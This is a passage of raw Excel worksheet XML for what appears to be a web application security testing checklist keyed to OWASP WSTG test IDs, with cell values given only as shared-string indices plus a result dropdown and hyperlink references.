      <c r="D69" s="3" t="s">
        <v>113</v>
      </c>
      <c r="E69" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="70" spans="1:5" ht="24" x14ac:dyDescent="0.2">
      <c r="B70" s="1" t="s">
        <v>358</v>
      </c>
      <c r="C70" s="8" t="s">
        <v>116</v>
      </c>
      <c r="D70" s="3" t="s">
        <v>115</v>
      </c>
      <c r="E70" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="71" spans="1:5" ht="24" x14ac:dyDescent="0.2">
      <c r="B71" s="1" t="s">
        <v>357</v>
      </c>
      <c r="C71" s="15" t="s">
        <v>117</v>
      </c>
      <c r="D71" s="3" t="s">
        <v>118</v>
      </c>
      <c r="E71" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="72" spans="1:5" ht="36" x14ac:dyDescent="0.2">
      <c r="B72" s="1" t="s">
        <v>46</v>
      </c>
      <c r="C72" s="15" t="s">
        <v>119</v>
      </c>
      <c r="D72" s="3" t="s">
        <v>120</v>
      </c>
      <c r="E72" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="73" spans="1:5" ht="24" x14ac:dyDescent="0.2">
      <c r="B73" s="1" t="s">
        <v>359</v>
      </c>
      <c r="C73" s="8" t="s">
        <v>121</v>
      </c>
      <c r="D73" s="3" t="s">
        <v>120</v>
      </c>
      <c r="E73" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="74" spans="1:5" ht="24" x14ac:dyDescent="0.2">
      <c r="B74" s="1" t="s">
        <v>47</v>
      </c>
      <c r="C74" s="8" t="s">
        <v>123</v>
      </c>
      <c r="D74" s="3" t="s">
        <v>122</v>
      </c>
      <c r="E74" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="75" spans="1:5" x14ac:dyDescent="0.2">
      <c r="B75" s="1" t="s">
        <v>360</v>
      </c>
      <c r="C75" s="15" t="s">
        <v>11</v>
      </c>
      <c r="D75" s="3" t="s">
        <v>125</v>
      </c>
      <c r="E75" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="76" spans="1:5" ht="24" x14ac:dyDescent="0.2">
      <c r="B76" s="1" t="s">
        <v>361</v>
      </c>
      <c r="C76" s="15" t="s">
        <v>362</v>
      </c>
      <c r="D76" s="3" t="s">
        <v>120</v>
      </c>
      <c r="E76" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="77" spans="1:5" ht="36" x14ac:dyDescent="0.2">
      <c r="A77" s="10" t="s">
        <v>311</v>
      </c>
      <c r="B77" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C77" s="15" t="s">
        <v>124</v>
      </c>
      <c r="D77" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E77" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="78" spans="1:5" ht="25.5" x14ac:dyDescent="0.2">
      <c r="A78" s="10" t="s">
        <v>312</v>
      </c>
      <c r="B78" s="1" t="s">
        <v>49</v>
      </c>
      <c r="C78" s="16" t="s">
        <v>126</v>
      </c>
      <c r="D78" s="3" t="s">
        <v>161</v>
      </c>
      <c r="E78" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="79" spans="1:5" ht="51" x14ac:dyDescent="0.2">
      <c r="A79" s="10" t="s">
        <v>313</v>
      </c>
      <c r="B79" s="1" t="s">
        <v>50</v>
      </c>
      <c r="C79" s="16" t="s">
        <v>128</v>
      </c>
      <c r="D79" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E79" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="80" spans="1:5" ht="51" x14ac:dyDescent="0.2">
      <c r="A80" s="10" t="s">
        <v>314</v>
      </c>
      <c r="B80" s="1" t="s">
        <v>51</v>
      </c>
      <c r="C80" s="3" t="s">
        <v>127</v>
      </c>
      <c r="D80" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E80" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="81" spans="1:6" ht="39.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A81" s="10" t="s">
        <v>315</v>
      </c>
      <c r="B81" s="1" t="s">
        <v>52</v>
      </c>
      <c r="C81" s="3" t="s">
        <v>129</v>
      </c>
      <c r="D81" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E81" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="82" spans="1:6" ht="24" x14ac:dyDescent="0.2">
      <c r="A82" s="10" t="s">
        <v>316</v>
      </c>
      <c r="B82" s="1" t="s">
        <v>53</v>
      </c>
      <c r="C82" s="15" t="s">
        <v>130</v>
      </c>
      <c r="D82" s="3" t="s">
        <v>368</v>
      </c>
      <c r="E82" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="83" spans="1:6" ht="24" x14ac:dyDescent="0.2">
      <c r="B83" s="1" t="s">
        <v>54</v>
      </c>
      <c r="C83" s="15" t="s">
        <v>131</v>
      </c>
      <c r="D83" s="3" t="s">
        <v>369</v>
      </c>
      <c r="E83" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="84" spans="1:6" ht="24" x14ac:dyDescent="0.2">
      <c r="B84" s="1" t="s">
        <v>55</v>
      </c>
      <c r="C84" s="15" t="s">
        <v>132</v>
      </c>
      <c r="D84" s="3" t="s">
        <v>369</v>
      </c>
      <c r="E84" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="85" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A85" s="10" t="s">
        <v>317</v>
      </c>
      <c r="B85" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C85" s="16" t="s">
        <v>133</v>
      </c>
      <c r="D85" s="3" t="s">
        <v>370</v>
      </c>
      <c r="E85" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="86" spans="1:6" ht="38.25" x14ac:dyDescent="0.2">
      <c r="A86" s="10" t="s">
        <v>318</v>
      </c>
      <c r="B86" s="1" t="s">
        <v>363</v>
      </c>
      <c r="C86" s="3" t="s">
        <v>364</v>
      </c>
      <c r="D86" s="4" t="s">
        <v>365</v>
      </c>
      <c r="E86" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="87" spans="1:6" ht="25.5" x14ac:dyDescent="0.2">
      <c r="A87" s="10" t="s">
        <v>319</v>
      </c>
      <c r="B87" s="1" t="s">
        <v>366</v>
      </c>
      <c r="C87" s="16" t="s">
        <v>134</v>
      </c>
      <c r="D87" s="4" t="s">
        <v>371</v>
      </c>
      <c r="E87" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="88" spans="1:6" ht="63.75" x14ac:dyDescent="0.2">
      <c r="A88" s="10" t="s">
        <v>320</v>
      </c>
      <c r="B88" s="1" t="s">
        <v>372</v>
      </c>
      <c r="C88" s="16" t="s">
        <v>12</v>
      </c>
      <c r="D88" s="4" t="s">
        <v>367</v>
      </c>
      <c r="E88" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="89" spans="1:6" ht="36" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A89" s="10" t="s">
        <v>321</v>
      </c>
      <c r="B89" s="1" t="s">
        <v>373</v>
      </c>
      <c r="C89" s="15" t="s">
        <v>374</v>
      </c>
      <c r="D89" s="4" t="s">
        <v>375</v>
      </c>
      <c r="E89" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="90" spans="1:6" ht="38.25" x14ac:dyDescent="0.2">
      <c r="A90" s="10" t="s">
        <v>322</v>
      </c>
      <c r="B90" s="1" t="s">
        <v>376</v>
      </c>
      <c r="C90" s="16" t="s">
        <v>377</v>
      </c>
      <c r="D90" s="4" t="s">
        <v>222</v>
      </c>
      <c r="E90" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="91" spans="1:6" ht="36" x14ac:dyDescent="0.2">
      <c r="A91" s="10" t="s">
        <v>323</v>
      </c>
      <c r="B91" s="7" t="s">
        <v>379</v>
      </c>
      <c r="C91" s="15" t="s">
        <v>380</v>
      </c>
      <c r="D91" s="28" t="s">
        <v>381</v>
      </c>
      <c r="E91" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="92" spans="1:6" ht="38.25" x14ac:dyDescent="0.2">
      <c r="A92" s="10" t="s">
        <v>324</v>
      </c>
      <c r="B92" s="7" t="s">
        <v>378</v>
      </c>
      <c r="C92" s="16" t="s">
        <v>382</v>
      </c>
      <c r="D92" s="4" t="s">
        <v>383</v>
      </c>
      <c r="E92" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="93" spans="1:6" x14ac:dyDescent="0.2">
      <c r="C93" s="15"/>
      <c r="D93" s="4"/>
      <c r="E93" s="4"/>
    </row>
    <row r="94" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A94" s="5" t="s">
        <v>57</v>
      </c>
      <c r="B94" s="2" t="s">
        <v>4</v>
      </c>
      <c r="C94" s="2" t="s">
        <v>6</v>
      </c>
      <c r="D94" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E94" s="2" t="s">
        <v>15</v>
      </c>
      <c r="F94" s="2" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="95" spans="1:6" ht="36" x14ac:dyDescent="0.2">
      <c r="A95" s="10" t="s">
        <v>280</v>
      </c>
      <c r="B95" s="1" t="s">
        <v>260</v>
      </c>
      <c r="C95" s="8" t="s">
        <v>135</v>
      </c>
      <c r="D95" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E95" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="96" spans="1:6" ht="76.5" x14ac:dyDescent="0.2">
      <c r="A96" s="10" t="s">
        <v>281</v>
      </c>
      <c r="B96" s="1" t="s">
        <v>261</v>
      </c>
      <c r="C96" s="3" t="s">
        <v>136</v>
      </c>
      <c r="D96" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E96" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="97" spans="1:6" ht="62.25" customHeight="1" x14ac:dyDescent="0.2">
      <c r="C97" s="8"/>
      <c r="D97" s="3"/>
      <c r="E97" s="3"/>
    </row>
    <row r="98" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A98" s="5" t="s">
        <v>58</v>
      </c>
      <c r="B98" s="2" t="s">
        <v>4</v>
      </c>
      <c r="C98" s="2" t="s">
        <v>6</v>
      </c>
      <c r="D98" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E98" s="2" t="s">
        <v>15</v>
      </c>
      <c r="F98" s="2" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="99" spans="1:6" ht="24" x14ac:dyDescent="0.2">
      <c r="A99" s="10" t="s">
        <v>282</v>
      </c>
      <c r="B99" s="1" t="s">
        <v>262</v>
      </c>
      <c r="C99" s="8" t="s">
        <v>265</v>
      </c>
      <c r="D99" s="3" t="s">
        <v>266</v>
      </c>
      <c r="E99" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="100" spans="1:6" ht="60" x14ac:dyDescent="0.2">
      <c r="A100" s="10" t="s">
        <v>283</v>
      </c>
      <c r="B100" s="1" t="s">
        <v>59</v>
      </c>
      <c r="C100" s="8" t="s">
        <v>137</v>
      </c>
      <c r="D100" s="3" t="s">
        <v>267</v>
      </c>
      <c r="E100" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="101" spans="1:6" ht="61.5" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A101" s="10" t="s">
        <v>284</v>
      </c>
      <c r="B101" s="1" t="s">
        <v>263</v>
      </c>
      <c r="C101" s="8" t="s">
        <v>138</v>
      </c>
      <c r="D101" s="3" t="s">
        <v>268</v>
      </c>
      <c r="E101" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="102" spans="1:6" ht="61.5" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A102" s="10" t="s">
        <v>285</v>
      </c>
      <c r="B102" s="1" t="s">
        <v>263</v>
      </c>
      <c r="C102" s="8" t="s">
        <v>138</v>
      </c>
      <c r="D102" s="3" t="s">
        <v>264</v>
      </c>
      <c r="E102" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="103" spans="1:6" x14ac:dyDescent="0.2">
      <c r="C103" s="15"/>
      <c r="D103" s="4"/>
      <c r="E103" s="4"/>
    </row>
    <row r="104" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A104" s="5" t="s">
        <v>60</v>
      </c>
      <c r="B104" s="2" t="s">
        <v>4</v>
      </c>
      <c r="C104" s="2" t="s">
        <v>6</v>
      </c>
      <c r="D104" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E104" s="2" t="s">
        <v>15</v>
      </c>
      <c r="F104" s="2" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="105" spans="1:6" ht="48" x14ac:dyDescent="0.2">
      <c r="A105" s="10" t="s">
        <v>298</v>
      </c>
      <c r="B105" s="1" t="s">
        <v>61</v>
      </c>
      <c r="C105" s="8" t="s">
        <v>140</v>
      </c>
      <c r="D105" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E105" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="106" spans="1:6" ht="60" x14ac:dyDescent="0.2">
      <c r="A106" s="10" t="s">
        <v>299</v>
      </c>
      <c r="B106" s="1" t="s">
        <v>62</v>
      </c>
      <c r="C106" s="8" t="s">
        <v>141</v>
      </c>
      <c r="D106" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E106" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="107" spans="1:6" ht="48.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A107" s="10" t="s">
        <v>300</v>
      </c>
      <c r="B107" s="1" t="s">
        <v>63</v>
      </c>
      <c r="C107" s="8" t="s">
        <v>142</v>
      </c>
      <c r="D107" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E107" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="108" spans="1:6" ht="84" x14ac:dyDescent="0.2">
      <c r="A108" s="10" t="s">
        <v>301</v>
      </c>
      <c r="B108" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C108" s="8" t="s">
        <v>143</v>
      </c>
      <c r="D108" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E108" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="109" spans="1:6" ht="84" x14ac:dyDescent="0.2">
      <c r="A109" s="10" t="s">
        <v>302</v>
      </c>
      <c r="B109" s="1" t="s">
        <v>65</v>
      </c>
      <c r="C109" s="8" t="s">
        <v>145</v>
      </c>
      <c r="D109" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E109" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="110" spans="1:6" ht="72" x14ac:dyDescent="0.2">
      <c r="A110" s="10" t="s">
        <v>303</v>
      </c>
      <c r="B110" s="1" t="s">
        <v>66</v>
      </c>
      <c r="C110" s="8" t="s">
        <v>144</v>
      </c>
      <c r="D110" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E110" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="111" spans="1:6" ht="60" x14ac:dyDescent="0.2">
      <c r="A111" s="10" t="s">
        <v>304</v>
      </c>
      <c r="B111" s="1" t="s">
        <v>353</v>
      </c>
      <c r="C111" s="8" t="s">
        <v>139</v>
      </c>
      <c r="D111" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E111" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="112" spans="1:6" ht="96" x14ac:dyDescent="0.2">
      <c r="A112" s="10" t="s">
        <v>305</v>
      </c>
      <c r="B112" s="1" t="s">
        <v>67</v>
      </c>
      <c r="C112" s="8" t="s">
        <v>146</v>
      </c>
      <c r="D112" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E112" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="113" spans="1:6" ht="60" x14ac:dyDescent="0.2">
      <c r="A113" s="10" t="s">
        <v>306</v>
      </c>
      <c r="B113" s="1" t="s">
        <v>68</v>
      </c>
      <c r="C113" s="8" t="s">
        <v>147</v>
      </c>
      <c r="D113" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E113" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="114" spans="1:6" x14ac:dyDescent="0.2">
      <c r="C114" s="8"/>
      <c r="E114" s="3"/>
    </row>
    <row r="115" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A115" s="5" t="s">
        <v>69</v>
      </c>
      <c r="B115" s="2" t="s">
        <v>4</v>
      </c>
      <c r="C115" s="2" t="s">
        <v>6</v>
      </c>
      <c r="D115" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E115" s="2" t="s">
        <v>15</v>
      </c>
      <c r="F115" s="2" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="116" spans="1:6" ht="24" x14ac:dyDescent="0.2">
      <c r="A116" s="10" t="s">
        <v>286</v>
      </c>
      <c r="B116" s="1" t="s">
        <v>352</v>
      </c>
      <c r="C116" s="8" t="s">
        <v>9</v>
      </c>
      <c r="D116" s="3" t="s">
        <v>151</v>
      </c>
      <c r="E116" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="117" spans="1:6" ht="17.25" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A117" s="10" t="s">
        <v>287</v>
      </c>
      <c r="B117" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C117" s="8" t="s">
        <v>148</v>
      </c>
      <c r="D117" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E117" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="118" spans="1:6" ht="24" x14ac:dyDescent="0.2">
      <c r="A118" s="10" t="s">
        <v>288</v>
      </c>
      <c r="B118" s="1" t="s">
        <v>71</v>
      </c>
      <c r="C118" s="8" t="s">
        <v>149</v>
      </c>
      <c r="D118" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E118" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="119" spans="1:6" ht="24" x14ac:dyDescent="0.2">
      <c r="A119" s="10" t="s">
        <v>289</v>
      </c>
      <c r="B119" s="1" t="s">
        <v>351</v>
      </c>
      <c r="C119" s="8" t="s">
        <v>150</v>
      </c>
      <c r="D119" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E119" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="120" spans="1:6" ht="48" x14ac:dyDescent="0.2">
      <c r="A120" s="10" t="s">
        <v>290</v>
      </c>
      <c r="B120" s="1" t="s">
        <v>72</v>
      </c>
      <c r="C120" s="8" t="s">
        <v>152</v>
      </c>
      <c r="D120" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E120" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="121" spans="1:6" ht="24" x14ac:dyDescent="0.2">
      <c r="A121" s="10" t="s">
        <v>291</v>
      </c>
      <c r="B121" s="1" t="s">
        <v>350</v>
      </c>
      <c r="C121" s="8" t="s">
        <v>153</v>
      </c>
      <c r="D121" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E121" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="122" spans="1:6" ht="24" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A122" s="10" t="s">
        <v>292</v>
      </c>
      <c r="B122" s="1" t="s">
        <v>349</v>
      </c>
      <c r="C122" s="8" t="s">
        <v>154</v>
      </c>
      <c r="D122" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E122" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="123" spans="1:6" ht="25.5" x14ac:dyDescent="0.2">
      <c r="A123" s="10" t="s">
        <v>293</v>
      </c>
      <c r="B123" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C123" s="8" t="s">
        <v>10</v>
      </c>
      <c r="D123" s="3" t="s">
        <v>167</v>
      </c>
      <c r="E123" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="124" spans="1:6" ht="36" x14ac:dyDescent="0.2">
      <c r="A124" s="10" t="s">
        <v>294</v>
      </c>
      <c r="B124" s="1" t="s">
        <v>74</v>
      </c>
      <c r="C124" s="8" t="s">
        <v>156</v>
      </c>
      <c r="D124" s="3" t="s">
        <v>155</v>
      </c>
      <c r="E124" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="125" spans="1:6" ht="25.5" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A125" s="10" t="s">
        <v>295</v>
      </c>
      <c r="B125" s="1" t="s">
        <v>75</v>
      </c>
      <c r="C125" s="8" t="s">
        <v>158</v>
      </c>
      <c r="D125" s="3" t="s">
        <v>164</v>
      </c>
      <c r="E125" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="126" spans="1:6" ht="48" x14ac:dyDescent="0.2">
      <c r="A126" s="10" t="s">
        <v>296</v>
      </c>
      <c r="B126" s="1" t="s">
        <v>253</v>
      </c>
      <c r="C126" s="8" t="s">
        <v>157</v>
      </c>
      <c r="D126" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E126" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="127" spans="1:6" ht="36" x14ac:dyDescent="0.2">
      <c r="A127" s="10" t="s">
        <v>297</v>
      </c>
      <c r="B127" s="1" t="s">
        <v>252</v>
      </c>
      <c r="C127" s="8" t="s">
        <v>165</v>
      </c>
      <c r="D127" s="3" t="s">
        <v>166</v>
      </c>
      <c r="E127" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="128" spans="1:6" ht="24" x14ac:dyDescent="0.2">
      <c r="A128" s="10" t="s">
        <v>254</v>
      </c>
      <c r="B128" s="1" t="s">
        <v>255</v>
      </c>
      <c r="C128" s="8" t="s">
        <v>256</v>
      </c>
      <c r="D128" s="3" t="s">
        <v>222</v>
      </c>
      <c r="E128" s="9" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="129" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A129"/>
      <c r="B129"/>
      <c r="C129"/>
      <c r="D129"/>
      <c r="E129"/>
      <c r="F129"/>
    </row>
    <row r="130" spans="1:6" customFormat="1" ht="13.5" thickBot="1" x14ac:dyDescent="0.25">
      <c r="A130" s="17" t="s">
        <v>247</v>
      </c>
      <c r="B130" s="18" t="s">
        <v>4</v>
      </c>
      <c r="C130" s="18" t="s">
        <v>6</v>
      </c>
      <c r="D130" s="18" t="s">
        <v>3</v>
      </c>
      <c r="E130" s="18" t="s">
        <v>15</v>
      </c>
      <c r="F130" s="18" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="131" spans="1:6" customFormat="1" ht="63.75" x14ac:dyDescent="0.2">
      <c r="A131" s="23" t="s">
        <v>248</v>
      </c>
      <c r="B131" s="19" t="s">
        <v>249</v>
      </c>
      <c r="C131" s="20" t="s">
        <v>250</v>
      </c>
      <c r="D131" s="21" t="s">
        <v>251</v>
      </c>
      <c r="E131" s="22" t="s">
        <v>16</v>
      </c>
      <c r="F131" s="19"/>
    </row>
    <row r="132" spans="1:6" customFormat="1" x14ac:dyDescent="0.2"/>
    <row r="133" spans="1:6" customFormat="1" x14ac:dyDescent="0.2"/>
    <row r="134" spans="1:6" customFormat="1" x14ac:dyDescent="0.2">
      <c r="A134" s="1"/>
      <c r="B134" s="1"/>
      <c r="C134" s="8"/>
      <c r="D134" s="3"/>
      <c r="E134" s="3"/>
      <c r="F134" s="1"/>
    </row>
    <row r="135" spans="1:6" x14ac:dyDescent="0.2">
      <c r="C135" s="8"/>
      <c r="D135" s="3"/>
      <c r="E135" s="3"/>
    </row>
    <row r="136" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A136" s="7"/>
      <c r="C136" s="8"/>
      <c r="D136" s="3"/>
      <c r="E136" s="3"/>
    </row>
    <row r="137" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A137" s="7" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="138" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A138" s="7" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="139" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A139" s="7" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="140" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A140" s="7" t="s">
        <v>5</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A1:B1"/>
    <mergeCell ref="A2:B2"/>
  </mergeCells>
  <phoneticPr fontId="2" type="noConversion"/>
  <dataValidations count="1">
    <dataValidation type="list" errorStyle="information" allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="result" sqref="E16:E26 E54:E62 E99:E102 E36:E45 E48:E51 E5:E13 E29:E33 E116:E129 E95:E96 E105:E113 E131:E133 E65:E92">
      <formula1>$A$137:$A$140</formula1>
    </dataValidation>
  </dataValidations>
  <hyperlinks>
    <hyperlink ref="A25" r:id="rId1" display="WSTG-CONFIG-010"/>
    <hyperlink ref="A5" r:id="rId2" display="WSTG-INFO-001"/>
    <hyperlink ref="A6" r:id="rId3" display="WSTG-INFO-002"/>
    <hyperlink ref="A7" r:id="rId4" display="WSTG-INFO-003"/>
    <hyperlink ref="A8" r:id="rId5" display="WSTG-INFO-004"/>
    <hyperlink ref="A9" r:id="rId6" display="WSTG-INFO-005"/>
    <hyperlink ref="A10" r:id="rId7" display="WSTG-INFO-006"/>
    <hyperlink ref="A11" r:id="rId8" display="WSTG-INFO-007"/>
    <hyperlink ref="A12" r:id="rId9" display="WSTG-INFO-008"/>
    <hyperlink ref="A13" r:id="rId10" display="WSTG-INFO-010"/>
    <hyperlink ref="A16" r:id="rId11" display="WSTG-CONFIG-001"/>
    <hyperlink ref="A17" r:id="rId12" display="WSTG-CONFIG-02"/>
    <hyperlink ref="A18" r:id="rId13" display="WSTG-CONFIG-03"/>
    <hyperlink ref="A19" r:id="rId14" display="WSTG-CONFIG-04"/>
    <hyperlink ref="A20" r:id="rId15" display="WSTG-CONFIG-05"/>
    <hyperlink ref="A21" r:id="rId16" display="WSTG-CONFIG-06"/>
    <hyperlink ref="A22" r:id="rId17" display="WSTG-CONFIG-07"/>
    <hyperlink ref="A23" r:id="rId18" display="WSTG-CONFIG-08"/>
    <hyperlink ref="A24" r:id="rId19" display="WSTG-CONFIG-09"/>
    <hyperlink ref="A26" r:id="rId20" display="WSTG-CONFIG-11"/>
    <hyperlink ref="A29" r:id="rId21"/>
    <hyperlink ref="A30" r:id="rId22"/>
    <hyperlink ref="A31" r:id="rId23"/>
    <hyperlink ref="A32" r:id="rId24"/>
    <hyperlink ref="A33" r:id="rId25"/>
    <hyperlink ref="A36" r:id="rId26"/>
    <hyperlink ref="A37" r:id="rId27"/>
    <hyperlink ref="A38" r:id="rId28"/>
    <hyperlink ref="A131" r:id="rId29"/>
    <hyperlink ref="A128" r:id="rId30"/>
    <hyperlink ref="A39" r:id="rId31"/>
    <hyperlink ref="A40" r:id="rId32"/>
    <hyperlink ref="A41" r:id="rId33"/>
    <hyperlink ref="A42" r:id="rId34"/>
    <hyperlink ref="A43" r:id="rId35"/>
    <hyperlink ref="A44" r:id="rId36"/>
    <hyperlink ref="A45" r:id="rId37"/>
    <hyperlink ref="A95" r:id="rId38" display="WSTG-ERR-001"/>
    <hyperlink ref="A96" r:id="rId39" display="WSTG-ERR-002"/>
    <hyperlink ref="A99" r:id="rId40" display="WSTG-CRYPST-001"/>
    <hyperlink ref="A100" r:id="rId41" display="WSTG-CRYPST-002"/>
    <hyperlink ref="A101" r:id="rId42" display="WSTG-CRYPST-003"/>
    <hyperlink ref="A102" r:id="rId43" display="WSTG-CRYPST-004"/>
    <hyperlink ref="A48" r:id="rId44"/>
    <hyperlink ref="A49" r:id="rId45"/>
    <hyperlink ref="A50" r:id="rId46"/>
    <hyperlink ref="A51" r:id="rId47"/>
    <hyperlink ref="A54" r:id="rId48"/>
    <hyperlink ref="A55" r:id="rId49"/>
    <hyperlink ref="A56" r:id="rId50"/>
    <hyperlink ref="A57" r:id="rId51"/>
    <hyperlink ref="A58" r:id="rId52"/>
    <hyperlink ref="A59" r:id="rId53"/>
    <hyperlink ref="A60" r:id="rId54"/>
    <hyperlink ref="A61" r:id="rId55"/>
    <hyperlink ref="A62" r:id="rId56"/>
    <hyperlink ref="A116" r:id="rId57"/>
    <hyperlink ref="A117" r:id="rId58"/>
    <hyperlink ref="A118" r:id="rId59"/>
    <hyperlink ref="A119" r:id="rId60"/>
    <hyperlink ref="A120" r:id="rId61"/>
    <hyperlink ref="A121" r:id="rId62"/>
    <hyperlink ref="A122" r:id="rId63"/>
    <hyperlink ref="A123" r:id="rId64"/>
    <hyperlink ref="A124" r:id="rId65"/>
    <hyperlink ref="A125" r:id="rId66"/>
    <hyperlink ref="A126" r:id="rId67"/>
    <hyperlink ref="A127" r:id="rId68"/>
    <hyperlink ref="A105" r:id="rId69"/>
    <hyperlink ref="A106" r:id="rId70"/>
    <hyperlink ref="A107" r:id="rId71"/>
    <hyperlink ref="A108" r:id="rId72"/>
    <hyperlink ref="A109" r:id="rId73"/>
    <hyperlink ref="A110" r:id="rId74"/>
    <hyperlink ref="A111" r:id="rId75"/>
    <hyperlink ref="A112" r:id="rId76"/>
    <hyperlink ref="A113" r:id="rId77"/>
    <hyperlink ref="A65" r:id="rId78"/>
    <hyperlink ref="A66" r:id="rId79"/>
    <hyperlink ref="A67" r:id="rId80"/>
    <hyperlink ref="A68" r:id="rId81"/>
    <hyperlink ref="A77" r:id="rId82"/>
    <hyperlink ref="A78" r:id="rId83"/>
    <hyperlink ref="A79" r:id="rId84"/>
    <hyperlink ref="A80" r:id="rId85"/>
    <hyperlink ref="A81" r:id="rId86"/>
    <hyperlink ref="A82" r:id="rId87"/>
    <hyperlink ref="A85" r:id="rId88"/>
